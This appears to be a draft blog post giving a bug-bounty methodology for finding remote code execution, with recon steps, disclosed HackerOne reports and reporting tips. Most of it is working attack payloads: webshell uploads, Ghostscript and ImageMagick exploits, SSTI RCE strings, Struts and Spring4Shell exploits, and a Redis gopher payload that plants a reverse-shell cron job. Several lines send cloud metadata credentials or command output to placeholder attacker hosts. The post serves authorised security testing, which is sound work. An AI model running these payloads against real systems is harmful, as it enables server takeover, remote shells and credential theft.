post #38 · tech

🦎 [DRAFT] Fantastic RCE and Where to Find Them

A Comprehensive Bug Bounty Target Remote Code Execution(RCE) Testing Methodology

"RCE is not a bug class — it's an impact. There are literally 1001 ways to achieve it." — Bugcrowd Research Team

Recon & Fingerprinting
Attack Surface Mapping
File Upload Vulnerabilities
Parser Exploits: Image & Document Converters
Server-Side Template Injection (SSTI)
Deserialization Attacks
Command Injection
XML External Entity (XXE)
Server-Side Request Forgery (SSRF) → RCE
SQL Injection → RCE
Known CVEs & Framework-Specific RCEs
Notable HackerOne Disclosed Reports
Tools & Wordlists
Reporting Tips

1. Recon & Fingerprinting

Before hunting for RCE, understand the attack surface. Technology fingerprinting is the foundation of every RCE hunt.

1.1 Passive Recon

Shodan/Censys/FOFA — surface exposed services, banners, and versions
- Shodan | Censys | FOFA

Google Dorking

site:target.com filetype:php inurl:upload
site:target.com inurl:admin intitle:"index of"
site:target.com "Powered by" (struts|rails|django|laravel)
site:hackerone.com/reports "RCE" "target.com"
inurl:"/wp-content/plugins/" site:target.com

Wayback Machine / Archive.org — find old endpoints, params, and tech stacks
- https://web.archive.org

GitHub Dorking

org:target "api_key" OR "SECRET_KEY" OR "password"
org:target filename:.env
org:target "internal" filename:config.yml

Tools: GitDorker, TruffleHog

1.2 Active Fingerprinting

Wappalyzer — browser extension for tech stack detection (wappalyzer.com)
WhatWeb — whatweb https://target.com
Nuclei — CVE-aware scanner with massive template library
- https://github.com/projectdiscovery/nuclei
```
nuclei -u https://target.com -t cves/ -t exposed-panels/ -t technologies/
```
Nmap — service and version scanning
```
nmap -sV -sC -p- target.com --open
```

httpx — fast HTTP probing

httpx -l subdomains.txt -tech-detect -status-code -title

1.3 Subdomain & Endpoint Enumeration

Amass / Subfinder / Assetfinder — subdomain discovery
- Amass | Subfinder

ffuf / dirsearch / feroxbuster — directory and endpoint fuzzing

ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -u https://target.com/FUZZ

ParamSpider / Arjun — hidden parameter discovery
- ParamSpider | Arjun
GAU (getallurls) — harvest URLs from Wayback, Common Crawl, OTX
- https://github.com/lc/gau

2. Attack Surface Mapping

Map every input to the application. Every parameter, header, file, and API endpoint is a potential entry point.

2.1 Input Vectors to Target

Vector	Examples	RCE Potential
File upload	Profile picture, PDF export, import	HIGH
URL/path parameters	`?file=`, `?template=`, `?page=`	HIGH
HTTP headers	X-Forwarded-For, User-Agent, Cookie	MEDIUM
JSON/XML bodies	API request bodies	HIGH
GraphQL queries	`query { user(id: "...") }`	MEDIUM
WebSocket messages	Real-time chat, feeds	MEDIUM
Email inputs	Contact forms, invitations	LOW-MEDIUM

2.2 Technology-Specific Attack Mapping

Once you've identified the stack, search for known vulnerabilities:

[CMS/Framework] + [version] + "RCE" OR "remote code execution" site:github.com OR site:exploit-db.com
[Tech] + CVE + exploit site:packetstormsecurity.com

3. File Upload Vulnerabilities

File uploads are one of the highest-yield RCE vectors in bug bounty programs.

3.1 Basic Bypass Techniques

Extension Bypass

webshell.php → webshell.php5, .php7, .phtml, .pht, .phps
webshell.php → webshell.PHP (case sensitivity bypass)
webshell.php → webshell.php.jpg (double extension)
webshell.php → webshell.php%00.jpg (null byte injection)
webshell.php → webshell.php;.jpg (semicolon bypass — IIS)
webshell.php → webshell.php::$DATA (NTFS alternate data stream — Windows)

MIME Type Bypass

Change Content-Type: application/x-php → Content-Type: image/jpeg in Burp
Magic bytes trick: prepend valid image magic bytes before PHP code
```
GIF89a; <?php system($_GET['cmd']); ?>
```

Content-Disposition Bypass

Rename via intercepting the multipart filename parameter
Use ../ in filename for path traversal to webroot

3.2 Execution Conditions

The file must be:

Stored in a web-accessible directory
Executed by the server (not just served statically)
Or passed to a vulnerable processing library

3.3 Notable HackerOne Reports

Starbucks — Webshell via Resume Upload Resume upload feature allowed .php webshell upload → RCE on server. https://hackerone.com/reports/506646
DoD — RCE via File Upload + Null Byte Null byte injection (file.php%00.jpg) bypassed extension filter. https://hackerone.com/reports/2054184
MTN Group — Unrestricted PHP Upload via Profile Picture Profile picture endpoint accepted any file type including .php. https://hackerone.com/reports/1164452
DoD — HTML/PHP Upload to RCE App allowed HTML file upload leading to stored XSS and PHP shell execution. https://hackerone.com/reports/900179

3.4 Checklist

[ ] Try all common server-side extensions (.php, .asp, .aspx, .jsp, .cfm)
[ ] Test MIME type bypass via Burp Suite
[ ] Check magic bytes bypass (prepend GIF89a; or PNG header)
[ ] Test null byte in filename
[ ] Test double extension (.jpg.php)
[ ] Upload SVG file to check for XXE/SSRF
[ ] Upload PDF/PS/EPS to trigger Ghostscript
[ ] Upload .htaccess to redefine execution rules (Apache only)
[ ] Check if uploaded files are stored in web-accessible path
[ ] Test path traversal in filename field

4. Parser Exploits: Image & Document Converters

Document and image parsers are a goldmine for RCE. When an application processes images, PDFs, or documents server-side using popular libraries, the libraries themselves may be vulnerable.

4.1 ImageMagick / ImageTragick

ImageMagick is used by millions of applications for image processing. Multiple critical vulnerabilities have been found over the years.

ImageTragick (CVE-2016-3714) — The Classic

The original ImageTragick vulnerability allowed code execution via crafted MVG/SVG files. Discovered by Stewie and Nikolay Ermishkin of the Mail.Ru Security Team in 2016.

push graphic-context
viewbox 0 0 640 480
fill 'url(https://127.0.0.1/oops)|id'
pop graphic-context

Reference: https://imagetragick.com GitHub Exploit Collection: https://github.com/barrracud4/image-upload-exploits

MSL Injection (CVE-2022-44268, CVE-2022-44267) — 2023

Arbitrary file read via specially crafted PNG. An attacker-controlled PNG causes ImageMagick to embed the contents of a local file into the converted image.

# Craft a PNG that reads /etc/passwd when processed
convert exploit.png output.png
# Output image contains /etc/passwd content

CVE-2024-33869 — Path Traversal & Command Execution

Affects recent versions of ImageMagick; allows path traversal leading to potential command execution.

Key Payloads

# Test for SSRF via DNS callback (ImageTragick)
push graphic-context
viewbox 0 0 640 480
fill 'url(http://BURPCOLLABORATOR.com/test)'
pop graphic-context

# Test for RCE via SVG
<image authenticate='ff" `id > /tmp/pwned`;"'>
  <read filename="pdf:/etc/passwd"/>
  <get width="base-width" height="base-height" />
  <resize geometry="400x400" />
  <write filename="test.png" />
</image>

# GhostScript delegation bypass (via EPS disguised as JPEG)
%!PS
userdict /setpagedevice undef
legal { null restore } stopped { pop } if
legal
mark /OutputFile (%pipe%id) currentdevice putdeviceprops

HackerOne Reports

HackerOne itself — RCE in Profile Picture Upload (ImageMagick) Profile picture processed with unpatched ImageMagick; MVG payload triggered RCE. https://hackerone.com/reports/135072
Semrush — RCE via Logo Upload + ImageMagick + Ghostscript Logo upload endpoint passed files to unpatched ImageMagick; researcher Frans Rosén achieved RCE using a Postscript payload. https://hackerone.com/reports/403417
Pixiv/Booth — ImageTragick v2 via GhostScript Shop header upload was passed to vulnerable ImageMagick; JPEG disguise triggered Ghostscript RCE. https://hackerone.com/reports/402362
Basecamp — RCE via Image Conversion (GhostScript) Image conversion pipeline called Ghostscript on attacker-supplied input. https://hackerone.com/reports/365271
Imgur — RCE via Command-Line Argument Injection (GraphicsMagick) The y parameter in /edit/process was injected into a gm convert call; GraphicsMagick's pipe-filename feature allowed command execution. https://hackerone.com/reports/212696

4.2 GhostScript

GhostScript is the PostScript/PDF interpreter used underneath ImageMagick for PS, EPS, and PDF processing.

The Vulnerability Pattern

When policy.xml does not explicitly disable EPS, PS, PDF, and XPS coders, ImageMagick delegates these file types to GhostScript. If GhostScript runs without the -dSAFER switch, the %pipe% command can be used to execute shell commands.

CVE-2019-14811 (Ghostscript < 9.50)

Specially crafted Postscript files disable sandbox protections (-dSAFER bypass) and allow arbitrary file system access or command execution.

%!PS
userdict /setpagedevice undef
legal
{ null restore } stopped { pop } if
legal
mark /OutputFile (%pipe%id) currentdevice putdeviceprops

Testing Strategy

Upload a file with .ps, .eps, .pdf, or .jpg extension but with PostScript content (magic bytes: %!PS)
Monitor DNS callback or out-of-band for execution confirmation
Try: %pipe%nslookup YOURBURPCOLLAB.com

Deep Dive: HackerOne Blog — ImageMagick RCE with Frans Rosén CVE reference: CVE-2019-14811

4.3 LibreOffice / OpenDocument Converters

Many applications (HR platforms, report builders, data importers) allow upload of .docx, .xlsx, .odt files and convert them server-side using LibreOffice in headless mode.

Macros & Event Triggers

LibreOffice supports embedded macros. If the conversion is done without --headless --infilter="writer_pdf_Export" and safe options, macros can fire.

# Malicious ODF with macro auto-execution
# Macro fires on document open event
Sub AutoOpen()
  Shell "curl http://YOURSERVER.com/rce"
End Sub

CVE-2018-16858 — LibreOffice Path Traversal → RCE

A specially crafted .odt file containing a relative path in a script URL could execute Python scripts.

DDE (Dynamic Data Exchange) in Office Documents

Inject DDE fields into .docx/.xlsx:

{DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe"}

Resource: PayloadsAllTheThings — Office Macros

4.4 PDF Processing (pdftotext, wkhtmltopdf, Puppeteer/Headless Chrome)

wkhtmltopdf SSRF → RCE

If the application generates PDFs from user-supplied HTML using wkhtmltopdf, internal SSRF is almost guaranteed.

<iframe src="file:///etc/passwd"></iframe>
<script>document.write(location.href)</script>

This can read internal files or hit internal services, and chain to RCE if internal services are vulnerable (e.g., metadata API in cloud environments).

Headless Browser SSRF

Puppeteer, Playwright, and PhantomJS-based PDF generators are subject to the same SSRF issues.

// In user-supplied HTML processed by headless Chrome
<script>
fetch('http://169.254.169.254/latest/meta-data/iam/security-credentials/')
  .then(r => r.text())
  .then(d => fetch('https://YOURSERVER.com/?data=' + btoa(d)))
</script>

pdftotext / poppler

Parse vulnerabilities have been found in poppler; test with malformed PDF files using fuzzing tools.

4.5 FFmpeg

Many platforms process video uploads using FFmpeg.

SSRF via HLS Playlist (CVE-2016-1897 / CVE-2016-1898)

#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:10.0,
http://YOURSERVER.com/ssrf
#EXT-X-ENDLIST

An attacker-controlled .m3u8 playlist causes FFmpeg to make requests to arbitrary URLs, enabling SSRF and potentially reading local files.

#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:10.0,
file:///etc/passwd
#EXT-X-ENDLIST

Resource: Hacktricks — FFmpeg

4.6 Checklist: Parser Exploits

[ ] Identify what processing library the application uses (check error messages, response headers, timing)
[ ] Upload a crafted PNG with embedded payload to test ImageMagick
[ ] Upload a .eps/.ps file disguised as JPEG to test GhostScript delegation
[ ] Upload .svg with external entity to test for SSRF/XXE
[ ] Upload .docx/.odt with macro to test LibreOffice
[ ] If PDF generation: embed <iframe src="file:///etc/passwd"> in user-controlled content
[ ] If video upload: supply a malicious .m3u8 HLS playlist
[ ] Check for GIF memory leak to confirm ImageMagick version
[ ] Test GraphicsMagick's pipe-filename feature via command-line injection

5. Server-Side Template Injection (SSTI)

SSTI occurs when user input is embedded directly into a server-side template string instead of passed as data. It frequently leads to RCE.

5.1 Detection

Try these probes in all input fields, URL parameters, and headers:

{{7*7}}
${7*7}
<%= 7*7 %>
#{7*7}
*{7*7}
${{7*7}}
{{7*'7'}}
${{"freemarker"?upper_case}}

If you see 49 reflected back, you have SSTI. Use the decision tree at https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection to identify the template engine.

5.2 Engine-Specific RCE Payloads

Jinja2 (Python/Flask)

# Basic RCE
{{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}

# Without quotes (filter bypass)
{{ request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('id')|attr('read')() }}

# Alternative via MRO
{{ ''.__class__.__mro__[1].__subclasses__()[396]('id',shell=True,stdout=-1).communicate()[0].strip() }}

Twig (PHP)

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
{{['id']|filter('system')}}

FreeMarker (Java)

<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("id") }

Velocity (Java)

#set($rt = $class.forName('java.lang.Runtime'))
#set($chr = $class.forName('java.lang.Character'))
#set($str = $class.forName('java.lang.String'))
#set($ex = $rt.getRuntime().exec('id'))
$ex.waitFor()
#set($out = $ex.inputStream)
#foreach($i in [1..$out.available()])
$str.valueOf($chr.toChars($out.read()))
#end

Smarty (PHP)

{php}echo `id`;{/php}
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}

Pebble (Java)

{% set cmd = 'id' %}
{% set bytes = (1).TYPE
     .forName('java.lang.Runtime')
     .methods[6]
     .invoke((1).TYPE.forName('java.lang.Runtime').methods[5].invoke(null),cmd) %}

EJS (Node.js)

<%= global.process.mainModule.require('child_process').execSync('id').toString() %>

Go (text/template)

{{.System "id"}}  // requires object with System method

5.3 SSTI Decision Tree (Quick Reference)

Input reflects? → Try {{7*7}}
  → 49? → Jinja2/Twig
    → {{7*'7'}} = 7777777? → Jinja2 (Python)
    → {{7*'7'}} = 49? → Twig (PHP)
  → ${7*7} = 49? → Freemarker/Velocity/Spring EL
  → #{7*7} = 49? → Ruby ERB / Thymeleaf
  → No reflection → Blind SSTI (use sleep payloads)

5.4 Resources

6. Deserialization Attacks

Deserialization vulnerabilities arise when attacker-controlled serialized objects are deserialized by the server, allowing execution of arbitrary code through "gadget chains."

6.1 Java Deserialization

Identifying Java Deserialization

Look for:

Base64-encoded blobs starting with rO0AB (Java serialized object magic bytes ACED 0005)
Content-Type: application/x-java-serialized-object
Libraries: Apache Commons Collections, Spring Framework, XStream, Jackson

Exploitation with ysoserial

ysoserial generates gadget-chain payloads for various Java libraries:

# Generate payload for Commons Collections 3
java -jar ysoserial.jar CommonsCollections1 'curl http://YOURSERVER.com/pwned' | base64 -w 0

# Common gadget chains:
# CommonsCollections1-7, Spring1-2, Hibernate1-2, BeanShell1, Groovy1

CVE-2025-55182 — React2Shell (CVSS 10.0) — 2025

The most significant deserialization RCE of recent years. Affects React Server Components (versions 19.0–19.2.0) and Next.js. Unauthenticated attacker sends a crafted HTTP POST request to any RSC endpoint; the React "Flight" protocol deserializes attacker-controlled data without validation, leading to arbitrary JavaScript execution on the Node.js server.

Disclosed: December 3, 2025
CVSS Score: 10.0 (Maximum)
Patched versions: React 19.0.1, 19.1.2, 19.2.1; Next.js latest
Exploited in wild: Yes — by nation-state actors (China-nexus) and cybercriminals
HackerOne: #1 most exploited CVE on the platform after disclosure
References: Rapid7 ETR | Google GTIG | HackerOne Blog

# Detection: POST request to RSC endpoint with crafted Flight payload
# Check for next-action or rsc-action-id headers
curl -X POST https://target.com/api/action \
  -H "next-action: [crafted-id]" \
  -d '[malicious_flight_payload]'

Apache Struts (CVE-2017-5638, CVE-2018-11776)

OGNL injection via Content-Type header (S2-045) or URL parameters.

Content-Type: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='id').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))).(#ros)}

6.2 PHP Deserialization

PHP's unserialize() function can trigger magic methods (__wakeup, __destruct, __toString) that form gadget chains.

Identifying PHP Deserialization

Look for:

Cookies or parameters containing O: (PHP object notation)
Base64-decoded values like: O:8:"stdClass":1:{s:4:"data";s:5:"hello";}

PHPGGC — PHP Gadget Chain Generator

# List available chains
phpggc -l

# Generate payload for Laravel/Monolog
phpggc Laravel/RCE1 system id | base64

PHPGGC

CVE-2024-34102 — Magento XXE + PHP Filter Chain → RCE (CosmicString)

A nested deserialization vulnerability in Magento's XML processing, chained with PHP filter chain research (CVE-2024-2961) by Charles Fol, achieves RCE through an XXE injection.

Reference: Assetnote Research

6.3 .NET Deserialization

Tools: ysoserial.net, ExploitRemotingService

Vulnerable classes: BinaryFormatter, SoapFormatter, NetDataContractSerializer, LosFormatter, ObjectStateFormatter

6.4 Node.js Prototype Pollution → RCE

Prototype pollution in Node.js applications can chain into RCE through certain template engines and spawn configurations.

// Example prototype pollution payload → RCE via child_process
{"__proto__": {"shell": "node", "NODE_OPTIONS": "--inspect=YOURSERVER:4444"}}

Blog: Prototype Pollution to RCE

7. Command Injection

Command injection occurs when user input is concatenated directly into OS commands.

7.1 Identifying Injection Points

Look for functionality that:

Pings a host (network tools)
Resolves a domain
Converts/processes files via system commands
Sends emails via sendmail
Generates reports/exports
Has a "test connection" feature (databases, APIs)

7.2 Payloads

# Basic command separators
; id
| id
|| id
& id
&& id
`id`
$(id)

# Blind out-of-band (use Burp Collaborator or interactsh)
; nslookup YOURBURP.com
; curl http://YOURSERVER.com/$(id)
| wget http://YOURSERVER.com?q=$(whoami)

# Filter bypass
# Whitespace bypass
{id}
$IFS$()id

# Quote bypass
i""d
i''d

# Encoding
%0aid   (newline)
%0did   (carriage return)

7.3 Argument Injection

When you can't inject separators but control a command-line argument:

# curl argument injection
--output /var/www/html/shell.php
-o /var/www/html/shell.php

# git clone argument injection
--upload-pack=touch${IFS}/tmp/pwned

# ImageMagick command injection (label parameter)
convert -label '@/etc/passwd' input.png output.png

# FFmpeg -i argument
-i 'http://YOURSERVER.com/malicious.m3u8'

7.4 Notable HackerOne Reports

DoD — RCE via PrimeFaces OGNL Injection (CVE-2017-1000486) PrimeFaces 5.x with weak encryption allowed expression injection. https://hackerone.com/reports/874924
Fastify — RCE via Unsafe EJS Template Execution @fastify/view with EJS engine allowed attacker-controlled raw content to execute arbitrary EJS. https://hackerone.com/reports/3122019

8. XML External Entity (XXE)

XXE attacks target XML parsers that process external entities. They can lead to file read, SSRF, and in some chains, RCE.

8.1 Basic XXE Payloads

<!-- Classic LFI via XXE -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root>&xxe;</root>

<!-- SSRF via XXE -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://YOURSERVER.com/xxe">]>
<root>&xxe;</root>

<!-- Blind XXE via DNS -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://YOURBURP.com/evil.dtd"> %xxe;]>

8.2 XXE in Document Parsers

Many file format parsers are essentially XML parsers:

.docx, .xlsx, .pptx — ZIP containing XML
.svg — XML
.odt, .odf — XML
SAML assertions — XML

<!-- SVG XXE -->
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]>
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
   <text font-size="16" x="0" y="16">&xxe;</text>
</svg>

8.3 XXE → RCE via PHP Filter Chains

Discovered by Charles Fol, PHP filter chains can convert an arbitrary file read (XXE, LFI) into RCE by generating PHP code through chained filter transforms.

php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7.../resource=/dev/null

Reference: CVE-2024-2961 — glibc iconv + PHP filters | Charles Fol's Research

8.4 Resources

9. Server-Side Request Forgery (SSRF) → RCE

SSRF allows an attacker to make the server issue requests on their behalf. It becomes RCE when it reaches exploitable internal services.

9.1 SSRF → RCE Escalation Paths

Internal Service	Exploitation Path
Cloud Metadata API (AWS/GCP/Azure)	Steal IAM credentials → lateral movement
Redis (unauthenticated)	Write SSH key or cron job → RCE
Elasticsearch	Execute scripts via search API
Jenkins	RCE via Groovy script console
Docker API (:2375)	Create privileged container → host escape
Kubernetes API	Create privileged pod
Memcached	Cache poisoning
Internal Git repos	Read secrets, source code

9.2 SSRF to Redis RCE

# Via SSRF, send raw TCP to Redis
gopher://127.0.0.1:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$XX%0d%0a%0a%0a*/1 * * * * bash -i >& /dev/tcp/YOURIP/4444 0>&1%0a%0a%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0a

9.3 Cloud Metadata Endpoints

# AWS
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/

# GCP
http://metadata.google.internal/computeMetadata/v1/
http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token

# Azure
http://169.254.169.254/metadata/instance?api-version=2021-02-01

# Kubernetes
https://kubernetes.default.svc/api/v1/namespaces/

9.4 Resources

10. SQL Injection → RCE

Advanced SQL injection can lead to RCE under certain conditions.

10.1 MySQL — INTO OUTFILE

# Write webshell to disk
SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/shell.php';

# Conditions required:
# - FILE privilege granted to MySQL user
# - Write access to web root
# - secure_file_priv not set

10.2 MSSQL — xp_cmdshell

-- Enable and use xp_cmdshell
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
EXEC xp_cmdshell 'whoami';

10.3 PostgreSQL — COPY TO/FROM + pg_read_file

-- Write file via COPY
COPY (SELECT '<?php system($_GET["cmd"]); ?>') TO '/var/www/html/shell.php';

-- Read file
SELECT pg_read_file('/etc/passwd');

-- Execute OS command via COPY PROGRAM (PostgreSQL 9.3+)
COPY (SELECT '') TO PROGRAM 'nslookup YOURSERVER.com';

10.4 SQLite — Load Extension

SELECT load_extension('/path/to/malicious.so');

10.5 Resources

11. Known CVEs & Framework-Specific RCEs

11.1 Legendary / Hall of Fame CVEs

CVE	Technology	Year	Description
CVE-2021-44228	Apache Log4j (Log4Shell)	2021	JNDI injection via `${jndi:ldap://}` in any logged field; unauthenticated RCE on virtually every Java application
CVE-2022-22965	Spring Framework (Spring4Shell)	2022	DataBinder parameter manipulation → webshell upload; CVSS 9.8
CVE-2022-22963	Spring Cloud Function	2022	SpEL injection via `spring.cloud.function.routing-expression` header
CVE-2017-5638	Apache Struts 2 (S2-045)	2017	OGNL injection via Content-Type header; used in Equifax breach
CVE-2019-0708	Windows RDP (BlueKeep)	2019	Pre-auth RCE in RDP protocol
CVE-2016-3714	ImageMagick (ImageTragick)	2016	Command execution via crafted image files

11.2 Recent Critical CVEs (2023–2025)

CVE	Technology	Year	Description
CVE-2025-55182	React Server Components (React2Shell)	2025	Unauthenticated RCE via insecure deserialization of RSC Flight payloads; CVSS 10.0; actively exploited by nation-state actors
CVE-2025-24813	Apache Tomcat	2025	RCE via partial PUT requests; under active exploitation
CVE-2025-15467	OpenSSL	2025	Stack overflow in CMS AuthEnvelopedData IV parsing; potential RCE
CVE-2025-3248	Langflow AI Platform	2025	Unauthenticated RCE via code-validation API endpoint (pre-auth)
CVE-2024-21683	Atlassian Confluence	2024	Authenticated RCE via malicious code macro language definition
CVE-2024-34102	Adobe Magento (CosmicString)	2024	XXE → nested deserialization → RCE; chained with PHP filter chain CVE-2024-2961
CVE-2023-22527	Atlassian Confluence	2024	Unauthenticated RCE via template injection in Data Center/Server
CVE-2023-22522	Atlassian Confluence	2023	RCE via template injection

11.3 Log4Shell (CVE-2021-44228) — The Evergreen

Log4Shell remains relevant because it affected virtually every Java application and many systems remain unpatched.

# Payload injected anywhere that gets logged
${jndi:ldap://YOURSERVER.com/a}
${jndi:rmi://YOURSERVER.com/a}
${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://YOURSERVER.com/a}

# Common injection points:
# User-Agent, X-Forwarded-For, Accept-Language, Referer, Username, Email

Reference: LunaSec Log4Shell writeup

11.4 Spring4Shell (CVE-2022-22965) — Java Framework RCE

Exploits Spring MVC's DataBinder to write a JSP webshell via Tomcat logging configuration.

curl -v -d 'class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=' https://target.com/

Reference: Pentest-Tools.com Spring4Shell Guide

11.5 React2Shell (CVE-2025-55182) — Modern Deserialization RCE

The most recent landmark RCE. Affects React Server Components, exploitable via a single unauthenticated POST request.

Detection:

Identify Next.js or RSC-based app (check X-Powered-By: Next.js header, or _next/ paths)
Check React version: cat package.json if source is exposed
Send crafted Flight payload to /_next/server-action endpoint

References: react2shell.com | OffSec Blog | Unit42

12. Notable HackerOne Disclosed Reports

A curated list of high-quality disclosed RCE reports with summaries:

Report	Program	Summary	Link
#135072	HackerOne	RCE via GIF upload processed by unpatched ImageMagick (ImageTragick) on profile picture endpoint	Link
#403417	Semrush	RCE via logo upload through ImageMagick + Ghostscript PostScript injection	Link
#402362	Pixiv	ImageTragick v2 via Ghostscript; JPEG-disguised PostScript payload	Link
#365271	Basecamp	Image conversion via GhostScript RCE	Link
#212696	Imgur	Command-line argument injection into GraphicsMagick `gm convert`; pipe-filename RCE	Link
#506646	Starbucks	Webshell upload via resume upload feature; arbitrary PHP execution	Link
#783877	Slack	HTML injection + security bypass + RCE JavaScript payload in Slack desktop app	Link
#733267	Valve (Portal 2)	RCE via voice packet buffer overflow (stack-based, no length validation)	Link
#874924	DoD	CVE-2017-1000486; PrimeFaces 5.x weak encryption → OGNL injection → RCE	Link
#231687	DoD	RCE on DoD website allowing attacker to execute remote commands on web server	Link
#3122019	Fastify	RCE via unsafe EJS template execution in `@fastify/view` plugin	Link
#3458235	IBM	RCE via React Server Components (CVE-2025-55182)	Link
#2995025	Mozilla VPN	Path traversal in `live_reload` command → RCE	Link

13. Tools & Wordlists

13.1 Essential Tools

Tool	Purpose	Link
Burp Suite Pro	Intercept, modify, replay HTTP	portswigger.net
Nuclei	Template-based vulnerability scanner	github.com/projectdiscovery/nuclei
ffuf	Web fuzzer	github.com/ffuf/ffuf
tplmap	SSTI detection & exploitation	github.com/epinna/tplmap
ysoserial	Java deserialization payload generator	github.com/frohoff/ysoserial
PHPGGC	PHP gadget chain generator	github.com/ambionics/phpggc
SQLMap	SQL injection automation	github.com/sqlmapproject/sqlmap
SSRFmap	SSRF exploitation	github.com/swisskyrepo/SSRFmap
Gopherus	SSRF → Gopher payload generator	github.com/tarunkant/Gopherus
interactsh	OOB interaction server	github.com/projectdiscovery/interactsh
Metasploit	Exploit framework	metasploit.com
image-upload-exploits	ImageMagick/GhostScript exploit files	github.com/barrracud4/image-upload-exploits
Amass	Subdomain enumeration	github.com/owasp-amass/amass
httpx	HTTP probing	github.com/projectdiscovery/httpx

13.2 Essential Wordlists

SecLists — The ultimate wordlist collection
PayloadsAllTheThings — Every payload type imaginable
FuzzDB — Attack payloads and patterns
HackTricks — Living security reference

13.3 Practice Environments

HackTheBox
TryHackMe
PortSwigger Web Security Academy — Free labs for every technique
DVWA — Damn Vulnerable Web Application
VulnHub

14. Reporting Tips

14.1 Structure of a Great RCE Report

# Remote Code Execution via [Vector] on [Endpoint]

## Summary
One paragraph describing the vulnerability and impact.

## Vulnerability Details
- Type: [e.g., SSTI / File Upload / Deserialization]
- Component: [e.g., /api/upload endpoint]
- Severity: Critical
- CVSS Score: [calculate at nvd.nist.gov/vuln-metrics/cvss]

## Steps to Reproduce
1. Navigate to...
2. Upload/Send...
3. Observe...

## Proof of Concept
[Include request/response, screenshots, or video]
[Use benign command like `id` or DNS callback — NEVER destructive commands]

## Impact
Full server compromise, data exfiltration, lateral movement...

## Recommended Fix
- Validate file types server-side using magic bytes
- Update [library] to patched version X.Y.Z
- Disable [dangerous feature]

14.2 RCE Proof-of-Concept Best Practices

ALWAYS use a benign PoC: id, whoami, hostname, or a DNS callback to Burp Collaborator
Never destructive: No rm -rf, no reading customer data, no pivoting
Document clearly: Screenshots, Burp request files, or a screen recording
One-stop demonstration: The PoC should be reproducible by the triage team

14.3 Severity Guidance

RCE Type	Typical Severity	CVSS Range
Unauthenticated RCE on internet-facing system	Critical	9.0–10.0
Authenticated RCE (any user)	Critical	8.5–9.5
Authenticated RCE (admin only)	High–Critical	7.5–9.0
RCE requiring complex preconditions	High	7.0–8.5
Blind RCE (DNS-only callback)	High	7.0–8.0

14.4 Useful References for Reporters

Appendix: Quick Reference Cheatsheet

RECON         → Wappalyzer → Nuclei → ffuf → GAU → Shodan
FILE UPLOAD   → ext bypass → MIME bypass → magic bytes → ImageMagick → GhostScript
SSTI          → {{7*7}} → engine ID → engine-specific RCE payload
DESERIALIZE   → Java (rO0AB) → ysoserial → PHP (O:) → PHPGGC → .NET
